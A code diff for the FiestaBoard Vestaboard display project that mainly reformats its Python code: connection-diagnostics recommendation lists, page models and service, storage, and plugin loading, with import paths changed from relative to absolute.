-                    "Check that your router is online and has an active internet connection.",
-                    "Try opening a website on another device connected to the same network.",
-                    "If other devices work, restart the device running FiestaBoard.",
-                    "If you use a VPN or corporate network, make sure it allows outbound HTTPS traffic.",
-                ],
-            })
+            recommendations.append(
+                {
+                    "summary": "FiestaBoard can look up addresses but cannot reach the internet",
+                    "steps": [
+                        "Check that your router is online and has an active internet connection.",
+                        "Try opening a website on another device connected to the same network.",
+                        "If other devices work, restart the device running FiestaBoard.",
+                        "If you use a VPN or corporate network, make sure it allows outbound HTTPS traffic.",
+                    ],
+                }
+            )
         else:
-            recommendations.append({
-                "summary": "No internet connection detected",
-                "steps": [
-                    "This is most likely caused by the DNS issue above — fix that first and internet access should come back.",
-                ],
-            })
+            recommendations.append(
+                {
+                    "summary": "No internet connection detected",
+                    "steps": [
+                        "This is most likely caused by the DNS issue above — fix that first and internet access should come back.",
+                    ],
+                }
+            )
 
     # --- Vestaboard ---
     vb = results.get("vestaboard", {})
@@ -274,108 +281,124 @@ def _build_recommendations(results: dict) -> list[dict]:
 
             if not vb_dns.get("ok", True):
                 hostname = vb_dns.get("hostname", "your board")
-                recommendations.append({
-                    "summary": f"FiestaBoard cannot find your Vestaboard ({hostname}) on the network",
-                    "steps": [
-                        "Make sure your Vestaboard is powered on (look for the LED on the back).",
-                        "Make sure both FiestaBoard and the Vestaboard are on the same Wi-Fi network.",
-                        "If you're using a name like 'vestaboard.local', try using the board's IP address instead — you can find it on your router's admin page or use FiestaBoard's network scan.",
-                        "Restart FiestaBoard after updating the address.",
-                    ],
-                })
+                recommendations.append(
+                    {
+                        "summary": f"FiestaBoard cannot find your Vestaboard ({hostname}) on the network",
+                        "steps": [
+                            "Make sure your Vestaboard is powered on (look for the LED on the back).",
+                            "Make sure both FiestaBoard and the Vestaboard are on the same Wi-Fi network.",
+                            "If you're using a name like 'vestaboard.local', try using the board's IP address instead — you can find it on your router's admin page or use FiestaBoard's network scan.",
+                            "Restart FiestaBoard after updating the address.",
+                        ],
+                    }
+                )
             elif not vb_port.get("ok", True):
                 port_num = vb_port.get("port", 7000)
-                recommendations.append({
-                    "summary": "FiestaBoard found the board's address but cannot connect to it",
-                    "steps": [
-                        "Make sure the Vestaboard is powered on.",
-                        f"Make sure the Local API is enabled on your board (port {port_num}). See https://docs.vestaboard.com/docs/local-api/authentication for details.",
-                        "If you recently changed networks, the board's address may have changed — check your router's admin page for the new IP.",
-                        "Try restarting the Vestaboard by unplugging it for 10 seconds.",
-                    ],
-                })
+                recommendations.append(
+                    {
+                        "summary": "FiestaBoard found the board's address but cannot connect to it",
+                        "steps": [
+                            "Make sure the Vestaboard is powered on.",
+                            f"Make sure the Local API is enabled on your board (port {port_num}). See https://docs.vestaboard.com/docs/local-api/authentication for details.",
+                            "If you recently changed networks, the board's address may have changed — check your router's admin page for the new IP.",
+                            "Try restarting the Vestaboard by unplugging it for 10 seconds.",
+                        ],
+                    }
+                )
             elif not vb_api.get("ok", True):
                 status = vb_api.get("status_code")
                 if status == 401 or status == 403:
-                    recommendations.append({
-                        "summary": "FiestaBoard connected to the Vestaboard but the API key was rejected",
-                        "steps": [
-                            "Verify your Local API key is correct — it was provided when you enabled the Local API with your enablement token.",
-                            "If you need a new key, request an enablement token at https://www.vestaboard.com/local-api and use it to re-enable the Local API.",
-                            "Restart FiestaBoard after updating the key.",
-                        ],
-                    })
+                    recommendations.append(
+                        {
+                            "summary": "FiestaBoard connected to the Vestaboard but the API key was rejected",
+                            "steps": [
+                                "Verify your Local API key is correct — it was provided when you enabled the Local API with your enablement token.",
+                                "If you need a new key, request an enablement token at https://www.vestaboard.com/local-api and use it to re-enable the Local API.",
+                                "Restart FiestaBoard after updating the key.",
+                            ],
+                        }
+                    )
                 elif status is not None:
-                    recommendations.append({
-                        "summary": f"The Vestaboard responded with an error (HTTP {status})",
-                        "steps": [
-                            "Try unplugging the Vestaboard for 10 seconds and plugging it back in.",
-                            "Wait about a minute for it to restart, then try again.",
-                            "If this keeps happening, the board may need a firmware update — check the Vestaboard app.",
-                        ],
-                    })
+                    recommendations.append(
+                        {
+                            "summary": f"The Vestaboard responded with an error (HTTP {status})",
+                            "steps": [
+                                "Try unplugging the Vestaboard for 10 seconds and plugging it back in.",
+                                "Wait about a minute for it to restart, then try again.",
+                                "If this keeps happening, the board may need a firmware update — check the Vestaboard app.",
+                            ],
+                        }
+                    )
                 else:
-                    recommendations.append({
-                        "summary": "FiestaBoard reached the board but got no response from its API",
-                        "steps": [
-                            "The board may still be starting up — wait 30 seconds and try again.",
-                            "If it still doesn't respond, unplug the board for 10 seconds and plug it back in.",
-                        ],
-                    })
+                    recommendations.append(
+                        {
+                            "summary": "FiestaBoard reached the board but got no response from its API",
+                            "steps": [
+                                "The board may still be starting up — wait 30 seconds and try again.",
+                                "If it still doesn't respond, unplug the board for 10 seconds and plug it back in.",
+                            ],
+                        }
+                    )
 
         elif mode == "cloud":
             cloud_api = steps.get("cloud_api", {})
             status = cloud_api.get("status_code")
             if status == 401 or status == 403:
-                recommendations.append({
-                    "summary": "The Vestaboard cloud service rejected your API key",
-                    "steps": [
-                        "Go to https://web.vestaboard.com and sign in to your account.",
-                        "Copy your Read/Write API key from the Vestaboard web dashboard.",
-                        "Paste it into your FiestaBoard .env file as BOARD_READ_WRITE_KEY.",
-                        "Restart FiestaBoard after updating the key.",
-                    ],
-                })
+                recommendations.append(
+                    {
+                        "summary": "The Vestaboard cloud service rejected your API key",
+                        "steps": [
+                            "Go to https://web.vestaboard.com and sign in to your account.",
+                            "Copy your Read/Write API key from the Vestaboard web dashboard.",
+                            "Paste it into your FiestaBoard .env file as BOARD_READ_WRITE_KEY.",
+                            "Restart FiestaBoard after updating the key.",
+                        ],
+                    }
+                )
             elif status is not None and status >= 500:
-                recommendations.append({
-                    "summary": "The Vestaboard cloud service is temporarily down",
-                    "steps": [
-                        "This is a problem on Vestaboard's end, not yours.",
-                        "Wait a few minutes and try again.",
-                        "If the problem continues, check https://twitter.com/vestaboard or https://vestaboard.com for service updates.",
-                    ],
-                })
+                recommendations.append(
+                    {
+                        "summary": "The Vestaboard cloud service is temporarily down",
+                        "steps": [
+                            "This is a problem on Vestaboard's end, not yours.",
+                            "Wait a few minutes and try again.",
+                            "If the problem continues, check https://twitter.com/vestaboard or https://vestaboard.com for service updates.",
+                        ],
+                    }
+                )
             elif cloud_api.get("error"):
-                recommendations.append({
-                    "summary": "FiestaBoard cannot reach the Vestaboard cloud service",
-                    "steps": [
-                        "Make sure the device running FiestaBoard has a working internet connection.",
-                        "Try opening https://rw.vestaboard.com in a browser on the same device.",
-                        "If you use a VPN or corporate network, make sure it allows connections to rw.vestaboard.com.",
-                    ],
-                })
+                recommendations.append(
+                    {
+                        "summary": "FiestaBoard cannot reach the Vestaboard cloud service",
+                        "steps": [
+                            "Make sure the device running FiestaBoard has a working internet connection.",
+                            "Try opening https://rw.vestaboard.com in a browser on the same device.",
+                            "If you use a VPN or corporate network, make sure it allows connections to rw.vestaboard.com.",
+                        ],
+                    }
+                )
             else:
-                recommendations.append({
-                    "summary": "Vestaboard cloud connection check failed",
-                    "steps": [
-                        "Double-check your BOARD_READ_WRITE_KEY in the .env file.",
-                        "Make sure your internet connection is working.",
-                        "Restart FiestaBoard and try again.",
-                    ],
-                })
+                recommendations.append(
+                    {
+                        "summary": "Vestaboard cloud connection check failed",
+                        "steps": [
+                            "Double-check your BOARD_READ_WRITE_KEY in the .env file.",
+                            "Make sure your internet connection is working.",
+                            "Restart FiestaBoard and try again.",
+                        ],
+                    }
+                )
 
     if not recommendations:
         # Check if everything truly passed
-        overall = all(
-            v.get("ok", False)
-            for v in results.values()
-            if isinstance(v, dict)
-        )
+        overall = all(v.get("ok", False) for v in results.values() if isinstance(v, dict))
         if overall:
-            recommendations.append({
-                "summary": "All checks passed — your Vestaboard connection is healthy",
-                "steps": [],
-            })
+            recommendations.append(
+                {
+                    "summary": "All checks passed — your Vestaboard connection is healthy",
+                    "steps": [],
+                }
+            )
 
     return recommendations
 
@@ -437,9 +460,7 @@ def run_full_diagnostics(
         }
 
     # Overall status
-    results["overall_ok"] = all(
-        v.get("ok", False) for v in results.values() if isinstance(v, dict)
-    )
+    results["overall_ok"] = all(v.get("ok", False) for v in results.values() if isinstance(v, dict))
 
     # Actionable troubleshooting recommendations
     results["recommendations"] = _build_recommendations(results)

--- a/src/pages/__init__.py
+++ b/src/pages/__init__.py
@@ -6,13 +6,9 @@ from .storage import PageStorage
 
 __all__ = [
     "Page",
-    "RowConfig",
-    "PageType",
-    "PageStorage",
     "PageService",
+    "PageStorage",
+    "PageType",
+    "RowConfig",
     "get_page_service",
 ]
-
-
-
-

--- a/src/pages/models.py
+++ b/src/pages/models.py
@@ -12,7 +12,7 @@ from typing import Literal
 
 from pydantic import BaseModel, ConfigDict, Field
 
-from ..devices import DEFAULT_DEVICE_TYPE, DeviceType, get_dimensions
+from src.devices import DEFAULT_DEVICE_TYPE, DeviceType, get_dimensions
 
 PageType = Literal["single", "composite", "template"]
 
@@ -25,6 +25,7 @@ class LineMetadata(BaseModel):
     Stores alignment and wrap settings that were previously encoded as
     inline prefixes ({center}, {wrap}, etc.) in the template strings.
     """
+
     alignment: LineAlignment = "left"
     wrap: bool = False
 
@@ -35,6 +36,7 @@ class RowConfig(BaseModel):
     Specifies which row from which source should be placed at which position.
     Row limits depend on the device type of the parent page.
     """
+
     source: str  # Display type (weather, datetime, etc.)
     row_index: int = Field(ge=0)  # Which row from source
     target_row: int = Field(ge=0)  # Where to place in output
@@ -50,6 +52,7 @@ class Page(BaseModel):
 
     Each page targets a specific device type (flagship: 22x6, note: 15x3).
     """
+
     id: str = Field(default_factory=lambda: str(uuid.uuid4()))
     name: str = Field(min_length=1, max_length=100)
     type: PageType
@@ -121,9 +124,8 @@ class Page(BaseModel):
                     if r.target_row > max_row:
                         errors.append(f"Target row {r.target_row} exceeds max {max_row} for {self.device_type}")
 
-        elif self.type == "template":
-            if not self.template or len(self.template) == 0:
-                errors.append("Template page requires template content")
+        elif self.type == "template" and (not self.template or len(self.template) == 0):
+            errors.append("Template page requires template content")
 
         return errors
 
@@ -134,6 +136,7 @@ class Page(BaseModel):
 
 class PageCreate(BaseModel):
     """Request model for creating a new page."""
+
     name: str = Field(min_length=1, max_length=100)
     type: PageType
     device_type: DeviceType = Field(default=DEFAULT_DEVICE_TYPE)
@@ -152,6 +155,7 @@ class PageCreate(BaseModel):
 
 class PageUpdate(BaseModel):
     """Request model for updating an existing page."""
+
     name: str | None = Field(default=None, min_length=1, max_length=100)
     display_type: str | None = None
     rows: list[RowConfig] | None = None
@@ -162,4 +166,3 @@ class PageUpdate(BaseModel):
     transition_strategy: str | None = None
     transition_interval_ms: int | None = Field(default=None, ge=0, le=5000)
     transition_step_size: int | None = Field(default=None, ge=1)
-

--- a/src/pages/service.py
+++ b/src/pages/service.py
@@ -8,11 +8,12 @@ import time
 from dataclasses import dataclass
 from datetime import UTC, datetime
 
-from ..devices import get_dimensions
-from ..displays.service import DisplayResult, get_display_service
-from ..plugins.manifest import DemoPageSchema
-from ..settings.service import get_settings_service
-from ..templates.engine import get_template_engine
+from src.devices import get_dimensions
+from src.displays.service import DisplayResult, get_display_service
+from src.plugins.manifest import DemoPageSchema
+from src.settings.service import get_settings_service
+from src.templates.engine import get_template_engine
+
 from .models import LineMetadata, Page, PageCreate, PageUpdate
 from .storage import PageStorage
 
@@ -48,6 +49,7 @@ DEFAULT_PAGE_TEMPLATE = DEFAULT_PAGE_TEMPLATES["flagship"]
 @dataclass
 class DeleteResult:
     """Result of a page deletion operation."""
+
     deleted: bool
     default_page_created: bool = False
     new_page_id: str | None = None
@@ -58,6 +60,7 @@ class DeleteResult:
 @dataclass
 class CachedPreview:
     """Cached preview result for a page."""
+
     result: DisplayResult
     page_updated_at: datetime | None  # Timestamp when page was last updated
     cached_at: float  # Unix timestamp when this was cached
@@ -136,7 +139,7 @@ class PageService:
             line_metadata=data.line_metadata,
             duration_seconds=data.duration_seconds,
             demo_plugin_id=data.demo_plugin_id,
-            created_at=datetime.now(UTC)
+            created_at=datetime.now(UTC),
         )
 
         return self.storage.create(page)
@@ -203,7 +206,7 @@ class PageService:
                 default_page_created=True,
                 new_page_id=default_page.id,
                 active_page_updated=is_active_page,
-                new_active_page_id=default_page.id if is_active_page else None
+                new_active_page_id=default_page.id if is_active_page else None,
             )
 
         # Normal deletion
@@ -221,11 +224,7 @@ class PageService:
                 settings_service.set_active_page_id(new_active_id)
                 logger.info(f"Active page updated to: {new_active_id}")
 
-        return DeleteResult(
-            deleted=True,
-            active_page_updated=is_active_page,
-            new_active_page_id=new_active_id
-        )
+        return DeleteResult(deleted=True, active_page_updated=is_active_page, new_active_page_id=new_active_id)
 
     def _create_default_page(self) -> Page:
         """Create and save a default welcome page.
@@ -238,7 +237,7 @@ class PageService:
             type="template",
             template=DEFAULT_PAGE_TEMPLATE,
             duration_seconds=300,
-            created_at=datetime.now(UTC)
+            created_at=datetime.now(UTC),
         )
         return self.storage.create(page)
 
@@ -251,9 +250,8 @@ class PageService:
         If *device_type* is provided, only pages matching that device type are returned.
         """
         for page in self.storage.list_all():
-            if page.demo_plugin_id == plugin_id:
-                if device_type is None or page.device_type == device_type:
-                    return page
+            if page.demo_plugin_id == plugin_id and (device_type is None or page.device_type == device_type):
+                return page
         return None
 
     def create_demo_page(self, plugin_id: str, demo: DemoPageSchema) -> tuple[Page, bool]:
@@ -312,18 +310,13 @@ class PageService:
         """
         if page.type == "single":
             return self._render_single(page)
-        elif page.type == "composite":
+        if page.type == "composite":
             return self._render_composite(page)
-        elif page.type == "template":
+        if page.type == "template":
             return self._render_template(page, context=context)
-        else:
-            return DisplayResult(
-                display_type="page",
-                formatted="",
-                raw={},
-                available=False,
-                error=f"Unknown page type: {page.type}"
-            )
+        return DisplayResult(
+            display_type="page", formatted="", raw={}, available=False, error=f"Unknown page type: {page.type}"
+        )
 
     def _render_single(self, page: Page) -> DisplayResult:
         """Render a single-source page."""
@@ -333,7 +326,7 @@ class PageService:
                 formatted="",
                 raw={"page_id": page.id},
                 available=False,
-                error="Single page missing display_type"
+                error="Single page missing display_type",
             )
 
         display_service = get_display_service()
@@ -345,7 +338,7 @@ class PageService:
             formatted=result.formatted,
             raw={"page_id": page.id, "source_data": result.raw},
             available=result.available,
-            error=result.error
+            error=result.error,
         )
 
     def _render_composite(self, page: Page) -> DisplayResult:
@@ -356,7 +349,7 @@ class PageService:
                 formatted="",
                 raw={"page_id": page.id},
                 available=False,
-                error="Composite page missing row configuration"
+                error="Composite page missing row configuration",
             )
 
         dims = get_dimensions(page.device_type)
@@ -375,23 +368,23 @@ class PageService:
             source_data[row_config.source] = result.raw
 
             # Split source into lines
-            source_lines = result.formatted.split('\n')
+            source_lines = result.formatted.split("\n")
 
             # Get the specified row if it exists
             if row_config.row_index < len(source_lines):
                 source_line = source_lines[row_config.row_index]
                 # Pad or truncate to device width
-                source_line = source_line[:dims.cols].ljust(dims.cols)
+                source_line = source_line[: dims.cols].ljust(dims.cols)
                 if row_config.target_row < dims.rows:
                     output_lines[row_config.target_row] = source_line
 
-        formatted = '\n'.join(output_lines)
+        formatted = "\n".join(output_lines)
 
         return DisplayResult(
             display_type="page:composite",
             formatted=formatted,
             raw={"page_id": page.id, "sources": source_data},
-            available=True
+            available=True,
         )
 
     def _render_template(self, page: Page, context: dict | None = None) -> DisplayResult:
@@ -413,7 +406,7 @@ class PageService:
                 formatted="",
                 raw={"page_id": page.id},
                 available=False,
-                error="Template page missing template content"
+                error="Template page missing template content",
             )
 
         try:
@@ -423,7 +416,9 @@ class PageService:
             # The template engine already handles tile-aware truncation in render_lines()
             # via _truncate_to_tiles() - color codes like {63} count as 1 tile each
             meta = [m.model_dump() for m in page.line_metadata] if page.line_metadata else None
-            formatted = template_engine.render_lines(page.template, context=context, line_metadata=meta, device_type=page.device_type)
+            formatted = template_engine.render_lines(
+                page.template, context=context, line_metadata=meta, device_type=page.device_type
+            )
 
             # Note: We do NOT truncate/pad by character count here because:
             # - Color codes like {63} are 4 characters but represent 1 tile
@@ -434,7 +429,7 @@ class PageService:
                 display_type="page:template",
                 formatted=formatted,
                 raw={"page_id": page.id, "template": page.template},
-                available=True
+                available=True,
             )
         except Exception as e:
             logger.error(f"Failed to render template: {e}", exc_info=True)
@@ -443,7 +438,7 @@ class PageService:
                 formatted="",
                 raw={"page_id": page.id, "template": page.template},
                 available=False,
-                error=f"Template rendering failed: {str(e)}"
+                error=f"Template rendering failed: {e!s}",
             )
 
     def preview_page(self, page_id: str, force_refresh: bool = False) -> DisplayResult | None:
@@ -477,15 +472,14 @@ class PageService:
 
         # Cache the result
         self._preview_cache[page_id] = CachedPreview(
-            result=result,
-            page_updated_at=page.updated_at,
-            cached_at=time.time()
+            result=result, page_updated_at=page.updated_at, cached_at=time.time()
         )
 
         return result
 
-    def preview_pages_batch(self, page_ids: list[str], force_refresh: bool = False,
-                            active_page_id: str | None = None) -> dict[str, DisplayResult | None]:
+    def preview_pages_batch(
+        self, page_ids: list[str], force_refresh: bool = False, active_page_id: str | None = None
+    ) -> dict[str, DisplayResult | None]:
         """Preview multiple pages, building template context once for efficiency.
 
         When rendering multiple template pages, the template context (plugin data)
@@ -538,20 +532,14 @@ class PageService:
 
                 # Cache the result
                 self._preview_cache[page_id] = CachedPreview(
-                    result=result,
-                    page_updated_at=page.updated_at,
-                    cached_at=time.time()
+                    result=result, page_updated_at=page.updated_at, cached_at=time.time()
                 )
 
                 results[page_id] = result
             except Exception as e:
                 logger.error(f"Error rendering page {page_id}: {e}")
                 results[page_id] = DisplayResult(
-                    display_type="page",
-                    formatted="",
-                    raw={"page_id": page_id},
-                    available=False,
-                    error=str(e)
+                    display_type="page", formatted="", raw={"page_id": page_id}, available=False, error=str(e)
                 )
 
         return results
@@ -576,7 +564,7 @@ class PageService:
         return {
             "cache_size": len(self._preview_cache),
             "cached_pages": list(self._preview_cache.keys()),
-            "ttl_seconds": PREVIEW_CACHE_TTL
+            "ttl_seconds": PREVIEW_CACHE_TTL,
         }
 
 
@@ -590,4 +578,3 @@ def get_page_service() -> PageService:
     if _page_service is None:
         _page_service = PageService()
     return _page_service
-

--- a/src/pages/share.py
+++ b/src/pages/share.py
@@ -62,10 +62,7 @@ def decode_page(share_string: str) -> dict:
     if not isinstance(v, int) or v < 1:
         raise ValueError("Invalid share string — bad version field.")
     if v > SHARE_VERSION:
-        raise ValueError(
-            f"This share string requires FiestaBoard v{v} or later. "
-            "Please update your installation."
-        )
+        raise ValueError(f"This share string requires FiestaBoard v{v} or later. Please update your installation.")
 
     page_data = envelope["page"]
     if not isinstance(page_data, dict):

--- a/src/pages/storage.py
+++ b/src/pages/storage.py
@@ -12,7 +12,8 @@ from collections.abc import Callable
 from datetime import UTC, datetime
 from pathlib import Path
 
-from ..text_utils import extract_alignment_from_line as _extract_alignment_from_line
+from src.text_utils import extract_alignment_from_line as _extract_alignment_from_line
+
 from .models import Page
 
 logger = logging.getLogger(__name__)
@@ -233,10 +234,7 @@ class PageStorage:
             if current_version >= target_version:
                 continue
             count = migrate_fn(pages_list)
-            logger.info(
-                f"Pages schema migration v{current_version}->v{target_version}: "
-                f"{count} page(s) processed"
-            )
+            logger.info(f"Pages schema migration v{current_version}->v{target_version}: {count} page(s) processed")
             current_version = target_version
 
         data["schema_version"] = CURRENT_SCHEMA_VERSION
@@ -249,7 +247,7 @@ class PageStorage:
             return
 
         try:
-            with open(self.storage_file) as f:
+            with self.storage_file.open() as f:
                 data = json.load(f)
 
             needs_save = self._run_migrations(data)
@@ -282,7 +280,7 @@ class PageStorage:
         try:
             data = {
                 "schema_version": CURRENT_SCHEMA_VERSION,
-                "pages": [page.model_dump() for page in self._pages.values()]
+                "pages": [page.model_dump() for page in self._pages.values()],
             }
 
             # Convert datetime objects to ISO strings for JSON serialization
@@ -292,7 +290,7 @@ class PageStorage:
                 if page_data.get("updated_at"):
                     page_data["updated_at"] = page_data["updated_at"].isoformat()
 
-            with open(self.storage_file, 'w') as f:
+            with self.storage_file.open("w") as f:
                 json.dump(data, f, indent=2)
 
             logger.debug(f"Saved {len(self._pages)} pages to storage")
@@ -418,7 +416,3 @@ class PageStorage:
     def count(self) -> int:
         """Get the number of stored pages."""
         return len(self._pages)
-
-
-
-

--- a/src/plugins/__init__.py
+++ b/src/plugins/__init__.py
@@ -25,23 +25,22 @@ from .sources import (
 )
 
 __all__ = [
-    "PluginBase",
-    "PluginResult",
-    "TriggerResult",
-    "PluginRegistry",
-    "get_plugin_registry",
     "INSTANCE_SEPARATOR",
+    "DemoPageSchema",
+    "PluginBase",
     "PluginLoader",
     "PluginManifest",
-    "DemoPageSchema",
-    "validate_manifest",
+    "PluginRegistry",
+    "PluginResult",
     "PluginSource",
     "RegistryEntry",
+    "TriggerResult",
+    "get_plugin_registry",
     "load_registry",
-    "validate_registry_repo_name",
     "plugin_id_from_repo_name",
+    "validate_manifest",
+    "validate_registry_repo_name",
 ]
 
 # Testing utilities (imported separately to avoid test dependencies in production)
 # Usage: from src.plugins.testing import PluginTestCase
-

--- a/src/plugins/base.py
+++ b/src/plugins/base.py
@@ -494,16 +494,14 @@ class PluginBase(ABC):
         """
         if not self.supports_triggers:
             logger.debug(
-                "fire_trigger called on plugin %s which does not declare "
-                "supports_triggers; ignoring",
+                "fire_trigger called on plugin %s which does not declare supports_triggers; ignoring",
                 self.plugin_id,
             )
             return
 
         if not getattr(trigger, "triggered", False):
             logger.debug(
-                "fire_trigger received a non-fired TriggerResult from %s; "
-                "ignoring",
+                "fire_trigger received a non-fired TriggerResult from %s; ignoring",
                 self.plugin_id,
             )
             return
@@ -518,7 +516,7 @@ class PluginBase(ABC):
             # Local import keeps the plugin base independent of the triggers
             # subpackage at import time (avoids a circular import — the
             # service module imports PluginBase).
-            from ..triggers.service import get_trigger_service
+            from src.triggers.service import get_trigger_service
         except Exception:
             logger.exception(
                 "fire_trigger could not import TriggerService for plugin %s",

--- a/src/plugins/base.py
+++ b/src/plugins/base.py
@@ -26,6 +26,7 @@ class PluginResult:
         error: Error message if fetch failed
         formatted_lines: Optional pre-formatted display lines (6 lines for board)
     """
+
     available: bool
     data: dict[str, Any] | None = None
     error: str | None = None
@@ -58,6 +59,7 @@ class TriggerResult:
         duration_seconds: How long the triggered message should be shown.
         data: Raw data dict available for template rendering.
     """
+
     triggered: bool
     trigger_id: str = ""
     message: str | None = None
@@ -92,6 +94,7 @@ class PluginInfo:
         repository: Source repository URL
         documentation: Path to README or docs
     """
+
     id: str
     name: str
     version: str
@@ -135,7 +138,6 @@ class PluginBase(ABC):
 
         Must match the 'id' field in manifest.json.
         """
-        pass
 
     @property
     def manifest(self) -> dict[str, Any]:
@@ -198,7 +200,6 @@ class PluginBase(ABC):
             PluginResult with available=True and data if successful,
             or available=False and error message if failed.
         """
-        pass
 
     def _get_refresh_schema(self) -> dict[str, Any] | None:
         """Get refresh_seconds property schema from the manifest, if defined."""
@@ -239,11 +240,8 @@ class PluginBase(ABC):
         default = refresh_schema.get("default", DEFAULT_REFRESH_SECONDS)
         value = self._config.get("refresh_seconds", default)
         floor = self.min_refresh_seconds
-        if floor is not None and isinstance(value, (int, float)) and value < floor:
-            logger.warning(
-                f"Plugin {self.plugin_id}: refresh_seconds {value} is below "
-                f"hard minimum {floor}, clamping"
-            )
+        if floor is not None and isinstance(value, int | float) and value < floor:
+            logger.warning(f"Plugin {self.plugin_id}: refresh_seconds {value} is below hard minimum {floor}, clamping")
             return floor
         return value
 
@@ -265,10 +263,7 @@ class PluginBase(ABC):
         if self._cached_result is not None and self._last_fetch_time is not None:
             age = (datetime.now() - self._last_fetch_time).total_seconds()
             if age < interval:
-                logger.debug(
-                    f"Using cached data for {self.plugin_id} "
-                    f"(age: {age:.0f}s < {interval}s)"
-                )
+                logger.debug(f"Using cached data for {self.plugin_id} (age: {age:.0f}s < {interval}s)")
                 return self._cached_result
 
         result = self.fetch_data()
@@ -300,16 +295,12 @@ class PluginBase(ABC):
         floor = self.min_refresh_seconds or MIN_REFRESH_SECONDS
         maximum = refresh_schema.get("maximum", MAX_REFRESH_SECONDS)
 
-        if not isinstance(value, (int, float)):
+        if not isinstance(value, int | float):
             errors.append("Refresh interval must be a number")
         elif value < floor:
-            errors.append(
-                f"Refresh interval must be at least {floor} seconds"
-            )
+            errors.append(f"Refresh interval must be at least {floor} seconds")
         elif value > maximum:
-            errors.append(
-                f"Refresh interval must not exceed {maximum} seconds"
-            )
+            errors.append(f"Refresh interval must not exceed {maximum} seconds")
 
         return errors
 
@@ -394,9 +385,7 @@ class PluginBase(ABC):
         timezone: str | None = None,
     ) -> Any:
         """Return a single config value from a resolved copy (see ``resolve_config_variables``)."""
-        resolved = self.resolve_config_variables(
-            extra_variables=extra_variables, timezone=timezone
-        )
+        resolved = self.resolve_config_variables(extra_variables=extra_variables, timezone=timezone)
         return resolved.get(key, default)
 
     def get_url(
@@ -547,4 +536,3 @@ class PluginBase(ABC):
             List of env var definitions with name, required, description.
         """
         return self._manifest.get("env_vars", [])
-

--- a/src/plugins/config_interpolation.py
+++ b/src/plugins/config_interpolation.py
@@ -33,12 +33,12 @@ _VAR_PATTERN = re.compile(r"\{\{\s*([a-zA-Z_][a-zA-Z0-9_.:%/-]*)\s*\}\}")
 
 # Common date formats that are pre-computed for convenience.
 _COMMON_DATE_FORMATS: list[str] = [
-    "%Y%m%d",       # 20250615
-    "%m/%d/%Y",     # 06/15/2025
-    "%m-%d",        # 06-15
-    "%Y-%m",        # 2025-06
-    "%d-%m-%Y",     # 15-06-2025
-    "%Y/%m/%d",     # 2025/06/15
+    "%Y%m%d",  # 20250615
+    "%m/%d/%Y",  # 06/15/2025
+    "%m-%d",  # 06-15
+    "%Y-%m",  # 2025-06
+    "%d-%m-%Y",  # 15-06-2025
+    "%Y/%m/%d",  # 2025/06/15
 ]
 
 
@@ -58,11 +58,13 @@ def get_builtin_variables(timezone: str | None = None) -> dict[str, str]:
     """
     try:
         if timezone:
-            from ..utils.datetime import DateTimeSource
+            from src.utils.datetime import DateTimeSource
+
             source = DateTimeSource(timezone=timezone)
             now = source.time_service.get_current_time(timezone)
         else:
-            from ..utils.datetime import get_datetime_source
+            from src.utils.datetime import get_datetime_source
+
             source = get_datetime_source()
             now = source.time_service.get_current_time(source.timezone)
     except Exception:
@@ -122,7 +124,8 @@ def interpolate_string(
             fmt = var_name[5:]  # strip "date:" prefix
             try:
                 # Use the same time source as builtin variables.
-                from ..utils.datetime import get_datetime_source
+                from src.utils.datetime import get_datetime_source
+
                 source = get_datetime_source()
                 now = source.time_service.get_current_time(source.timezone)
                 return now.strftime(fmt)

--- a/src/plugins/loader.py
+++ b/src/plugins/loader.py
@@ -27,9 +27,11 @@ DEFAULT_PLUGINS_DIR = "plugins"
 # FiestaBoard version compatibility helpers
 # ---------------------------------------------------------------------------
 
+
 def _get_fiestaboard_version() -> str:
     """Return the running FiestaBoard version."""
-    from .. import __version__
+    from src import __version__
+
     return __version__
 
 
@@ -60,24 +62,20 @@ def _check_version_constraint(constraint: str, running_version: str) -> tuple[bo
 
     satisfied = {
         ">=": running >= required,
-        ">":  running > required,
+        ">": running > required,
         "<=": running <= required,
-        "<":  running < required,
+        "<": running < required,
         "==": running == required,
         "!=": running != required,
     }[op]
 
     if not satisfied:
-        return False, (
-            f"Plugin requires FiestaBoard {constraint}, "
-            f"but running version is {running_version}"
-        )
+        return False, (f"Plugin requires FiestaBoard {constraint}, but running version is {running_version}")
     return True, ""
 
 
 class PluginLoadError(Exception):
     """Raised when a plugin fails to load."""
-    pass
 
 
 class PluginLoader:
@@ -267,12 +265,8 @@ class PluginLoader:
             running = _get_fiestaboard_version()
             ok, reason = _check_version_constraint(manifest.fiestaboard_version, running)
             if not ok:
-                logger.warning(
-                    "Plugin '%s' version incompatibility: %s", plugin_name, reason
-                )
-                self._load_errors.setdefault(plugin_name, []).append(
-                    f"Version incompatibility: {reason}"
-                )
+                logger.warning("Plugin '%s' version incompatibility: %s", plugin_name, reason)
+                self._load_errors.setdefault(plugin_name, []).append(f"Version incompatibility: {reason}")
 
         # Load Python module
         # Support two repo layouts:
@@ -323,8 +317,7 @@ class PluginLoader:
             # Verify plugin_id property
             if plugin_instance.plugin_id != manifest.id:
                 errors.append(
-                    f"Plugin class plugin_id '{plugin_instance.plugin_id}' "
-                    f"does not match manifest id '{manifest.id}'"
+                    f"Plugin class plugin_id '{plugin_instance.plugin_id}' does not match manifest id '{manifest.id}'"
                 )
                 self._load_errors[plugin_name] = errors
                 return None
@@ -508,4 +501,3 @@ class PluginLoader:
         except Exception as e:
             logger.exception("Failed to create instance of %s: %s", plugin_id, e)
             return None
-

--- a/src/plugins/manifest.py
+++ b/src/plugins/manifest.py
@@ -50,6 +50,7 @@ def _inject_trigger_page_id(settings_schema: dict[str, Any]) -> dict[str, Any]:
         properties["trigger_page_id"] = copy.deepcopy(TRIGGER_PAGE_ID_PROPERTY)
     return enriched
 
+
 # JSON Schema for validating manifest.json files
 MANIFEST_SCHEMA = {
     "type": "object",

--- a/src/plugins/manifest.py
+++ b/src/plugins/manifest.py
@@ -58,41 +58,19 @@ MANIFEST_SCHEMA = {
         "id": {
             "type": "string",
             "pattern": "^[a-z][a-z0-9_]*$",
-            "description": "Unique plugin identifier (lowercase, underscores allowed)"
+            "description": "Unique plugin identifier (lowercase, underscores allowed)",
         },
-        "name": {
-            "type": "string",
-            "minLength": 1,
-            "maxLength": 50,
-            "description": "Human-readable plugin name"
-        },
+        "name": {"type": "string", "minLength": 1, "maxLength": 50, "description": "Human-readable plugin name"},
         "version": {
             "type": "string",
             "pattern": "^\\d+\\.\\d+\\.\\d+$",
